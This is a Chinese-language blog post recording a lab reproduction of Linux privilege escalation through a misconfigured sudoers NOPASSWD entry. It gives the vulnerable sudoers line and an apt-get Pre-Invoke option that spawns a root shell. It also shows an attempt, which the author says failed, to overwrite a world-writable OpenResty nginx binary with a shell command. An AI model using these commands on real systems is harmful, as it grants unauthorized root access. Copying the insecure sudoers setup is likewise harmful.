Linux abuse of rights

  1. 前言
  2. 正文
    1. NOPASSWD:apt提权
    2. /usr/local/openresty/nginx/nginx提权

前言

通过LInux在/etc/sudoers滥配置的提权研究,原文:Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
640?wx_fmt=jpeg

正文

为了做好实验我们先做好对应的准备,原文有针对以下几个滥用的提权

NOPASSWD的两个apt-get dpkg
NOPASSWD与/usr/local/openresty/nginx/nginx权限为777 openresty 

系统环境为:

Ubuntu 16.04

Ubuntu默认没有安装openresty,安装方法:Ubuntu 平台下OpenResty的安装 - zstu_cc的专栏 - CSDN博客
配置出一个存在提权漏洞的环境:
sudo vim /etc/sudoers

cs ALL=(ALL)NOPASSWD:/usr/bin/apt-get,/usr/bin/nginx,/usr/bin/dpkg
这里的cs为你要测试的用户名NOPASSWD后面的是执行sudo后不用输入密码的命令

kkwtW4.png

配置完之后,切换一个没root权限的用户输入sudo -l即可看到刚刚配置的操作
kkwDw6.png

NOPASSWD:apt提权

查看apt-get帮助手册可以看见,-o []option]的参数用户可以自行设置
图片借用原文:
aptgetman.png

执行:apt update APT::Update::Pre-InVoke::="/bin/bash -i"

发现权限已经变更
kkBTzQ.png

Pre-Invoke是预调用的意思

/usr/local/openresty/nginx/nginx提权

这里我没有成功,由于/us/local/openresty/nginx/sbin/nginx权限为777,导致可以随意写入
执行:

echo "/bin/bash -i" > /usr/local/openresty/nginx/sbin/nginx

kkg7tI.png
然后原文是执行openrety即可提权成功
kk2eHJ.png

kk2a4I.md.png
知道怎么回事的师父可以告诉我一下吗= =#!

后面的完全不知道怎么操作
Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Linux abuse of rights

本文作者:九世

发布时间:2019-01-22, 18:07:19

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/f448c508.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录